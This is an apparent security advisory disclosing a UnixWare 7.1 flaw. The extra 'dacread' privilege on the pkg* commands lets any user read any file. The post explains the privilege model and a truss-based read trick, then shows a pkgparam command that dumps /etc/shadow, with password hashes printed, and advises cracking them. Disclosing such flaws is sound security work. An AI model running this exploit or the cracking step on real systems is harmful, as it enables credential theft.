Greetings, OVERVIEW Any user may read any file on the system. BACKGROUND Only UnixWare 7.1 has been tested. DETAILS As previously stated, UnixWare binaries gain additional privileges via standard suid/sgid AND /etc/security/tcb/privs. The majority of the UnixWare "pkg" command, such as pkginfo, pkgcat, pkgparam, etc, are vulnerable to a bug which will allow any user to read any file on the system as a result of their additional "dacread" permission in the privs file. The dacread permission allows a process to override the Discretionary Access Controls (DAC) for read-only operations. Basically, a process with the dacread permissions is able to bypass the mode bits and ownership on a file, but only for reading it. A process with dacwrite permissions can bypass mode bits to write to or execute that file. I'm pretty sure that the bugs I found in the pkg commands were introduced by their addition to the privs file. As far as I can tell, there is virtual ly no reason for them to be able to read any file on the system. All around, this additional privilege thing, well, sucks. Consider now that the truss(1) command will allow the user to see any file i/o that happens between a process and the system since it isn't suid/sgid. Thus, if there is *any* way that you can make pkg* read from a file, even if the output is never printed, you can examine truss output to get the file's contents. EXPLOIT The worst offender of pkg* is pkgparam, which will print the contents of a file to stdout, though I've been able to get most of the pkg program to read from /etc/shadow in one way or another and grab the contents with truss. bash-2.02$ ls -la /bin/pkgparam -r-xr-xr-x 1 root sys 166784 May 21 1999 /bin/pkgparam bash-2.02$ /bin/pkgparam -f /etc/shadow Dy0l3OC7XHsj.:10925:::::: NP:6445:::::: NP:6445:::::: NP:6445:::::: NP:6445:::::: NP:6445:::::: NP:6445:::::: NP:6445:::::: NP:6445:::::: NP:6445:::::: *LK*::::::: *LK*::::::: *LK*::::::: BgusHRQZ9MH2U:10878:::::: *LK*::::::: *LK*::::::: *LK*::::::: *LK*::::::: *LK*::::::: nv.Xrh2V3vArc:10882:::::: ozT.yeRe1/dxY:10882:::::: RinwpQfqabYbc:10928:::::: bash-2.02$ Now just concatenate the first field of /etc/passwd with this file and run your favorite cracker. Brock Tellier UNIX Systems Administrator Chicago, IL, USA btellier@usa.net